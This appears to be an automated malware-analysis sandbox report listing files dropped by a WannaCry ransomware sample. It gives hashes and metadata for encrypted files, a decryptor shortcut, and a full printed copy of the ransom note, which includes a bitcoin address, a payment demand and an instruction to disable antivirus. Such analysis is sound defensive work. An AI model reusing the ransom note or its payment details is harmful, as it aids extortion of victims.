                                SHA-512:C237398486A78F20A88F56BBE9212BA936CF3FA6490CDF2A27AA3FD52D553C3577864892BE491235724FDC09550A64F4F372BBA36C3311EEBB40425BBF5CEFAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.766652737060187
                                Encrypted:false
                                SSDEEP:24:AqPboGN016VeNrWA6GNGaBnM1gGMJe29L+cDzcRLBAqlXhKEr:RPbt0oBf12ntGM19LQzlRKEr
                                MD5:15D4394291D092B614071D85D42E4BE5
                                SHA1:8BA91814215392B152A954ABFA776041AA1E5E68
                                SHA-256:2016F58DFAA698D0A6B9E36412DEAC207EF6352F19B98E42FFDBBC932CB3C6A8
                                SHA-512:2B781F2349A9B3369E5C9B8078C6C3E75BC17322B47660B48AB76707FB260F5A58AF8981B54DDA76E9F4F08A0F6C08AD8DFDCCBD3EAFD02844E7847FA3DF3504
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8449958923201155
                                Encrypted:false
                                SSDEEP:24:bkmj8H2Pe5rRICnFbJke4sKB/MzyEwQ/3Msk6lggObcLLeEgf2aT48v/lFAx1urD:bkOiscFbJkJsQUe+n8cLlgv48IS/
                                MD5:3BF3A2177057293B0D6842239841A5D0
                                SHA1:EDF256E32464A5718A14B67D69B06C602BE37A8D
                                SHA-256:655BBD211079C078F29D7EFDC295312EFA65C419A627BD183F2913B93112948C
                                SHA-512:0A8A999B586DF3E68AE30F2235BE9BADD96F75F6A92C847B4C5B63AF23C41F565084B1E62B51FB6A7762CCF924A959763E81A65A9A3FE5874AE3E5705EF22231
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.814633834419284
                                Encrypted:false
                                SSDEEP:24:M9ddSnmq1h5yVa/4kz3m0UreREkQrn5cXOET76GasS8Sk8N:M9ddSnf5yW4k2NLLEHPS8b8N
                                MD5:28FB151652BD31D3261087450A74E569
                                SHA1:08C32AE8D54A092E5D84F3F9C9C66E55BB91B0B8
                                SHA-256:B1DA3465A0936C955E8BA3B3DE4D5DAB2D52D232162F4A8F524523B838D832B6
                                SHA-512:E50486024B473AEB6FAB51F6C32BD6F1138CB134CF849A40AD02214555CD4311A078A387CC7AF5EF4EC029777D189CAA193A384BA7B737C943E1841CF2CC0EC7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8656171812228575
                                Encrypted:false
                                SSDEEP:24:bkBuVjY72o7G8zhoj7q8sRV9c9PGrrIN/I+S/648+AN1vfIXaj6kG2o+5:bkyYqo9aj7q8OV9c9LkQN1q2oq
                                MD5:B96DF3FD833B9807360D68E8A6863667
                                SHA1:2ECB42F541BC8C874676F6B10E7B8CB7AAD3B1DF
                                SHA-256:6D5923B587F3F561EC5F1D77C13023DCCBEA3ECE181D2BF148FAB9DC0CA35AB2
                                SHA-512:F62370D8952279ABDEABF54CF748B1A93FB9BA642B12FD6075E72DED406D7E2E48EDDA96ED5473143504A8AE48D77C77DB8A74C98F0BD1822AB7C4BF88726CD0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796441820550681
                                Encrypted:false
                                SSDEEP:24:5virJCATcPE2sbbMilfrJdb8dN+3KU8arJfy3R7YfS+pKF4:5vpf82skur78dw6MrJfcCoK
                                MD5:5694350CC437C5B99765EE5F7599A50C
                                SHA1:CAA1B663EFCF02939BF41F4687EBE02B244BD414
                                SHA-256:D83115D6B0E430C989644E71FA544AA03A6FAE1E2C4AB5E52F6F5C258D0B7897
                                SHA-512:1F511800DE2204BE3FB4D2C725A8167F7FB14CA3E85FAD2E8720553A90A24E64C587F746566C63CE34F3CFFA71AA8C6FBA86E231F9B9DDA63D427F2AA52D795C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853993705693698
                                Encrypted:false
                                SSDEEP:24:bk39A8KczKwsNYZCpWNwNt9yTWrD8Z7dh3EMz4YvrkBFfWpQNWYFuPLipdV:bk3ne7NYZCpAwNt9yTW6paMnGFe2pdV
                                MD5:4E428167762402B45B78661842C7F324
                                SHA1:2E32DE4025A131C86804FAFC5B331BEC760AF598
                                SHA-256:E87C6A8E742AE05818FA5C3E8AE5492326BB83354B599A82C2D30357D153D2AE
                                SHA-512:E842B99F507DCA0DC2D11FC8A59F1DDFAA19FB65B3665747F16BB28D7A9474C77FB9DDDE1E69832B0D6305839EB4B7E9DC0F8AF41DFDD106CF805D315EE3A41B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.795318270694324
                                Encrypted:false
                                SSDEEP:24:XXcQh/o8RhN+hMzWHsrbBdQiloENWo/gwnPphN35rVP9+:XXBTahMzWYbfQ4LEoRnPzJ5JPs
                                MD5:6F7B6A4B9F5378EF0E8174D0A919076E
                                SHA1:FBC1F490620F894EAF6CE435425829BCD1D4ADB5
                                SHA-256:F14ECF9B51D3E440A8AD1438B11B255EB8E0CCBA88F9AC7BE33B61278713F436
                                SHA-512:AEC5CDD086041E34A14E2FE8107DBBD6B3EBE37D087570FEDEAE33C86AEF75994F242F5430104EC7DD5E47BE7FA445E0054B3399FBD1608F35A313655C6B968A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842332952217968
                                Encrypted:false
                                SSDEEP:24:bkXOT0rSpsQga5rs60O8YW2Er0A9tKNbrdhcRpvOuCNAsR6AaHUxovy4rw:bkM0eSgsROdZEr0dNNivO5w0xovy4M
                                MD5:6674D02F14CF00CB957086A53C9226C7
                                SHA1:FFD9E163B1B9F26BB47D8A8D3EB2DDF04F3D18E5
                                SHA-256:3A17CEA9B6CF01AA3EFAD30E9511F488809ADFBDAAB98E123EE31E7A49CE093D
                                SHA-512:85858353224FD27A80992E01C77ADA0C6F3C2FD81611EB24F779536199E474C929A83457E234465A5A1D48D9AEC44393628361E7CE414699EB50CB8F90617685
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842332952217968
                                Encrypted:false
                                SSDEEP:24:bkXOT0rSpsQga5rs60O8YW2Er0A9tKNbrdhcRpvOuCNAsR6AaHUxovy4rw:bkM0eSgsROdZEr0dNNivO5w0xovy4M
                                MD5:6674D02F14CF00CB957086A53C9226C7
                                SHA1:FFD9E163B1B9F26BB47D8A8D3EB2DDF04F3D18E5
                                SHA-256:3A17CEA9B6CF01AA3EFAD30E9511F488809ADFBDAAB98E123EE31E7A49CE093D
                                SHA-512:85858353224FD27A80992E01C77ADA0C6F3C2FD81611EB24F779536199E474C929A83457E234465A5A1D48D9AEC44393628361E7CE414699EB50CB8F90617685
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823856327616033
                                Encrypted:false
                                SSDEEP:24:Z0C6Bje+sZA8N71mPAlgLdlemH+FfbdgcWeh1JxN:xAje+sZZh1LlgLnUMe9
                                MD5:9AB06F4CB3DC2BF7166E3E2C19AC9B2C
                                SHA1:22F6F23198041CCA6C76435AB902728A91E58177
                                SHA-256:0BE27A9DC89024B80F64F43950958799493F34C213E23601990C283E72A965BD
                                SHA-512:E186C95BBD78B48E08B41DE9F7CA2D9D2A66A0CC55C0E5FDE36AFD7016974B49BF5AFB01B26AF82534FE90077B1E83FC5DE53E22EDB308426257CE37F19CEE4F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8405169029249535
                                Encrypted:false
                                SSDEEP:24:bk45SfNfeB0BO8Uboj1XFtrqYhCRMiCHYy98gTMCcQKdXGyh:bk4Sw0BxUbMVBqWxXwdXGyh
                                MD5:AEACAEF7C24B22F9A111EE24EA00560C
                                SHA1:182EAA32BA9B9937B49F46472023A6046C4C18C5
                                SHA-256:10EE50DE5BE77492DDA158698966E56DB095D97EDB8EC193C67E0CAD79C18EE2
                                SHA-512:D86938B8FE72B5A5954062A55E3DB8183969EEAD8D14C978B779C6A6DB3325DF961D7C6EFA931DCF7856773E8BDD2FE8E154291F2FC55AF987D4938E007B4AAE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8405169029249535
                                Encrypted:false
                                SSDEEP:24:bk45SfNfeB0BO8Uboj1XFtrqYhCRMiCHYy98gTMCcQKdXGyh:bk4Sw0BxUbMVBqWxXwdXGyh
                                MD5:AEACAEF7C24B22F9A111EE24EA00560C
                                SHA1:182EAA32BA9B9937B49F46472023A6046C4C18C5
                                SHA-256:10EE50DE5BE77492DDA158698966E56DB095D97EDB8EC193C67E0CAD79C18EE2
                                SHA-512:D86938B8FE72B5A5954062A55E3DB8183969EEAD8D14C978B779C6A6DB3325DF961D7C6EFA931DCF7856773E8BDD2FE8E154291F2FC55AF987D4938E007B4AAE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8104928499402515
                                Encrypted:false
                                SSDEEP:24:4+Zr8xJi0CzUmUvWiUJ8+dOel73lP98ggP76a8nIH74:4i8xJRCfVW+dtZ67PBHH74
                                MD5:DFF975324BE65D819D01F7A2688AF7B6
                                SHA1:E1711C87D624B64ADEECB923F76076CC678D0E5E
                                SHA-256:4D40482E3483E2475965DD1C89EF9FF7B58B51EE60DA7B59C445DCE1CA64128B
                                SHA-512:06153A50903DB16B221E344BA361D9BA8A9F923336508E1B0621947D7787C6308732424063714C195440AEC5AE8B2AE58B17D9D6046F747002A9EAAB755711E2
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844631326477872
                                Encrypted:false
                                SSDEEP:24:bkiQ23ObF6FMmQ+QQ45Z8PeFcph7BvP8TFl8prHFcCgFZQ6XS87/XuV0pw:bkb23y6GmvN4eeFcbeTFlqqFZQinzuV1
                                MD5:E45BA418D78334F5706825BF08044FB3
                                SHA1:B8A9C7915843BCF865626923FB01AADD0E502868
                                SHA-256:F4D276F5571605735DBBFE4D7A031B6C756F0A45A5684BA3A797F35110EB0164
                                SHA-512:D55E7713C49B020728D4B59EE1A22963B2F2D332882F74C2978CC777758245047AC652507340768C79E87E38354D82AED0B7490026A80FEFA0912676A4D67CD3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844631326477872
                                Encrypted:false
                                SSDEEP:24:bkiQ23ObF6FMmQ+QQ45Z8PeFcph7BvP8TFl8prHFcCgFZQ6XS87/XuV0pw:bkb23y6GmvN4eeFcbeTFlqqFZQinzuV1
                                MD5:E45BA418D78334F5706825BF08044FB3
                                SHA1:B8A9C7915843BCF865626923FB01AADD0E502868
                                SHA-256:F4D276F5571605735DBBFE4D7A031B6C756F0A45A5684BA3A797F35110EB0164
                                SHA-512:D55E7713C49B020728D4B59EE1A22963B2F2D332882F74C2978CC777758245047AC652507340768C79E87E38354D82AED0B7490026A80FEFA0912676A4D67CD3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8006151324953565
                                Encrypted:false
                                SSDEEP:24:53Qj6hHuS8vIY+bH/wzU3L4aqtdOnbTO3CptIfa:5gjNITbYg3L4LYTOSvIC
                                MD5:4B6E762FC13C9E8CAA9FD63655984795
                                SHA1:C5ACC1D73C41D651D506DCBE3E0C61232AFAEA61
                                SHA-256:3311C36FC48E09A654FBE97AE58AC1A67212BDEF51E66AAEF330D588E9CE0E99
                                SHA-512:2F365D00E352505DB4529F963F450CF2153A4E0B4C88C360F4366B206BE82EB660FF78843C716F92E0433FB6A7D3D68BB5F6AD711962B3A8BCD135EDD592D500
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8461941818618905
                                Encrypted:false
                                SSDEEP:24:bkaLstMAU/fh349zRUhisuRgMEpdF0FDfcVjZBc4gGd+Ugx/WVebuzc2i2:bkaLdAMh+1UXuWxXGfq9K5Q+5ec2i2
                                MD5:6B64535AD7A5DC3C6D076002600F1B54
                                SHA1:B70183C73D3487ECE36C768ED8FDA7F5DE156097
                                SHA-256:F8F9EC3747BFFDB05C9B1E34D1BF585AC6B8F753FCED7B9F98F856A2DD097900
                                SHA-512:D728695F93266B18211C421DD88EE03CBE7B540EE5F435F376F7597B1D87BDED3ED5B3F95522789AFB39C61321C732801D32465808F27766B25B54A31226D26F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8461941818618905
                                Encrypted:false
                                SSDEEP:24:bkaLstMAU/fh349zRUhisuRgMEpdF0FDfcVjZBc4gGd+Ugx/WVebuzc2i2:bkaLdAMh+1UXuWxXGfq9K5Q+5ec2i2
                                MD5:6B64535AD7A5DC3C6D076002600F1B54
                                SHA1:B70183C73D3487ECE36C768ED8FDA7F5DE156097
                                SHA-256:F8F9EC3747BFFDB05C9B1E34D1BF585AC6B8F753FCED7B9F98F856A2DD097900
                                SHA-512:D728695F93266B18211C421DD88EE03CBE7B540EE5F435F376F7597B1D87BDED3ED5B3F95522789AFB39C61321C732801D32465808F27766B25B54A31226D26F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.781439569212249
                                Encrypted:false
                                SSDEEP:24:u9w0kC6ufM0svyrroAeGHtTOOR5YTtQRt+x:t0R6qoy4O5PR5Yie
                                MD5:9DF6847CF6CDEA0D1FF23B2A1BE43743
                                SHA1:2F2D922C09CAE591BD18186CB732318ED8E356DA
                                SHA-256:F2A284974646E77F3BEDE2D5F56C62F43D67DBB821AAB759CDE8245C7063B018
                                SHA-512:947B1421B56134C0A6AFD47C0514248E7691517C68187044A6EADBF0B5195A3ECBA59163CFD77814C2B0993131D193E7D568EB3FB7A84EE057F1AE505B6C47E3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83174919747474
                                Encrypted:false
                                SSDEEP:24:bkGC7EkxOQ2CB9XjNiqLDpl81QAtWs9KRaPfnR9qwKv3I3JmKREHP:bkt7XX2CDJi+gTojR6n2BIUKiHP
                                MD5:D5EF08B967E91FC93A69F2BCD4B28D6C
                                SHA1:88A109308C4B1AD45682D378B4A3A084172B7DF9
                                SHA-256:C3A8F723E78EAA8ABE74CDF6D9F84669E1313CC512BB148C72D1FF1954207DA3
                                SHA-512:50997DA4013E259E75FC5D0E4A4A907569500722D923A200469F36C404DD66536A2E231D295D085F955BA07210A66BF0A8F12F4E8FF79A609526A0FFC1FC41A0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83174919747474
                                Encrypted:false
                                SSDEEP:24:bkGC7EkxOQ2CB9XjNiqLDpl81QAtWs9KRaPfnR9qwKv3I3JmKREHP:bkt7XX2CDJi+gTojR6n2BIUKiHP
                                MD5:D5EF08B967E91FC93A69F2BCD4B28D6C
                                SHA1:88A109308C4B1AD45682D378B4A3A084172B7DF9
                                SHA-256:C3A8F723E78EAA8ABE74CDF6D9F84669E1313CC512BB148C72D1FF1954207DA3
                                SHA-512:50997DA4013E259E75FC5D0E4A4A907569500722D923A200469F36C404DD66536A2E231D295D085F955BA07210A66BF0A8F12F4E8FF79A609526A0FFC1FC41A0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.81318327433351
                                Encrypted:false
                                SSDEEP:24:H+6W4hb/Rrgnh0jaIDIJUgCTQjkyPiReN9WyMABI5iAVOe2:HDWkUajdgVjLbTKAu9g
                                MD5:3275A185136840D9B12E6480CAF151B1
                                SHA1:B261860C689BD06102D468D1205EA6BC01FDB1C1
                                SHA-256:151E85490D912D60B940CB3D9B357AE397A378934F33CE066D642D8709B0200F
                                SHA-512:BF2370A48DAAEE9640343D8A1EB2DAE127EA3043E1AB77ADFC5865E7EDE5AC643DC477C51603B86F0625BF77E0B90932AE0E3BA59EBB9404ADBB0203A3C42443
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843798829962274
                                Encrypted:false
                                SSDEEP:24:bkDK10NXtfMYKQ1CpSn4lpErPew4Nr+w9xxy0OF5mmmRfJ9OQjZb24Z/43:bkWGDfMYnai4lpECw4sw3VOON5JFZ24i
                                MD5:DE995038FE8EA6D2C6BB9BA49180126D
                                SHA1:4E0BEF963487D3F765F9542F42BC990E3DD559AF
                                SHA-256:39DA0C5DEF930220F761F248D032EDE0A9185A916258032ABA6DCC57CE6F2E18
                                SHA-512:4FB7DB8B6964DA01B478941EEE165A0AC16F1D51E3EE419FC6CF78FE81EDA96D4DCC74FCF2CE6C14E917174874B0B6AA5C1EC9DC51AD8AC9A1E274F3AC96E3B9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843798829962274
                                Encrypted:false
                                SSDEEP:24:bkDK10NXtfMYKQ1CpSn4lpErPew4Nr+w9xxy0OF5mmmRfJ9OQjZb24Z/43:bkWGDfMYnai4lpECw4sw3VOON5JFZ24i
                                MD5:DE995038FE8EA6D2C6BB9BA49180126D
                                SHA1:4E0BEF963487D3F765F9542F42BC990E3DD559AF
                                SHA-256:39DA0C5DEF930220F761F248D032EDE0A9185A916258032ABA6DCC57CE6F2E18
                                SHA-512:4FB7DB8B6964DA01B478941EEE165A0AC16F1D51E3EE419FC6CF78FE81EDA96D4DCC74FCF2CE6C14E917174874B0B6AA5C1EC9DC51AD8AC9A1E274F3AC96E3B9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8298450175821435
                                Encrypted:false
                                SSDEEP:24:i08BQjZjvvl2U1voXBlAJ/oFUNBDNNKJHjqpB4YZ8za4CTA1ziuh:ikjvvwU4vFUNBDNgJHoGTaA5nh
                                MD5:460B014EE93B20824EB086F721D07CC0
                                SHA1:2635328CCAAF18E761EA7D4170C518A54EE52B6A
                                SHA-256:7F13EDDB728612BCEAA4B236EF920130AC82EA71FA599D00218A2E075BCE8FBC
                                SHA-512:689A9ADC225E797FF07F20A431675BFFB7E95A05BACC7F1A6B6889279EACDAA4A4039AB587244D9B036C46B9195A76C5CC15730B60F84A63A63CD70B78ABC675
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823738767831794
                                Encrypted:false
                                SSDEEP:24:bksXbe+aC0dLdYmNPPjRgYyzhv8UPGOv8I5aiLAax:bk+y+3UL5N3jSbhkUxvKm
                                MD5:D997A94E52584363A0472CA831FC7487
                                SHA1:2B270CEC863A4C6D14F43F91E2D248BE507D9BDA
                                SHA-256:2DBBF1FF03732647AD9F210ABCCE7346F2055B63BE02EDF1CAA5D3822A5A12B2
                                SHA-512:643ECC285CB3A4519883D9357FC8746B6302AE3CC016F0CDBADCBA681D09592DE4F6C7A7BC4FE08AB9BC091AE0E3A4EA10AC2FA6FF47855EED2C2F0CAB76FA64
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816404250179475
                                Encrypted:false
                                SSDEEP:24:hu0sAkfN4+Hjm5Clg6YE5tu1nNlRsWI6VTBcIAzpYf+MH:sXAuN4VUD/uNNvxI8BcIipwFH
                                MD5:E4E2F5D8264B4F22EBBA1C97EA3CDDE8
                                SHA1:6B29FD441DA46482FB678064DF30CA02552B2649
                                SHA-256:C96C01252679928957458EC0C9C65DBA703C7590AC8518A821C71A735EB610D2
                                SHA-512:ACCAB9869BA89FB976BD7A4B5B7BF7C27465AEFFBD075BFF0BFF27F7E47751F73B1F9575101AAE293A960ADA5659166571DCC4EBDAAFC039598C9A9A71CDE78F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.850191176289814
                                Encrypted:false
                                SSDEEP:24:bkn3lf6M9gTYp7YstSOu7GpWxgKvkbiEc/nF5UWYNZv+V/NNAHQfneAglEohpTJo:bknVT9Eqkso8Wxg1pc/YhZWVVNAwveHc
                                MD5:99018B0C0B41E555B90AF99371707739
                                SHA1:2B4B705A95DC8C83BD28615B9A0CE403955BB6DC
                                SHA-256:3D5CF70B92E81A76CEF5553F9EEA5667B64F3EAEB83A436BE008E13D82225C9E
                                SHA-512:DB9615D32257BC821050FD2CDAE5A8AB240DF96F70C9165E35B22F816575B56077D5825152400DC144E2F20EB93E9B051B9CE1D4B2025985B7C9F5D031824BC3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83846907899383
                                Encrypted:false
                                SSDEEP:24:OqdeWDnrrHyQ8gJXPChmDR2zG1NXDvxOLfF4WlJanPqfdIN6f27:7hDrrSpT0DQz6TvCF46Jzugf27
                                MD5:9753D4C4157A6ED2089C56B3547134AD
                                SHA1:612F1C32DE3667B8702AA88C0920AF77F13F06EA
                                SHA-256:CD778D3622911E5DDD07BDC18A4F8477D3DA9A97A0865753DFE5169067A9B9F0
                                SHA-512:4F98892295B1AA5342158DEFB5004A63AB538D36CD52FE44DC1CAB16C95AD5728F89EB38944039456C4938F4BD4BD285298DCCCA5BD118106828677DAAF20BBB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.809166067084224
                                Encrypted:false
                                SSDEEP:24:bklcKfOFM03WGa22NCL+Dd09Za3LT7o6t7fpIYG0r9jWe6MmNzbd87bkh:bk6kOSK+NNCL+y9k3LT7o6t7fplGYFWb
                                MD5:A83CEFFD4E1098A9D51122589DB31741
                                SHA1:1DE543C049B24A3A4F4B5BECCE0724BE2D18255B
                                SHA-256:B96A34917FE3216CC7D006DF16BB77CE128B37D78429635F80D5BAAE187E2553
                                SHA-512:DBC193D79D61375DF7F0DD44D70D9A9FB763564D6895BA6D57B9DA082A12188AABFE8A0C4119DF6D92ABBEC49A0A66A5FDBE1B0B97E1848D948CD62AB47B6EE0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
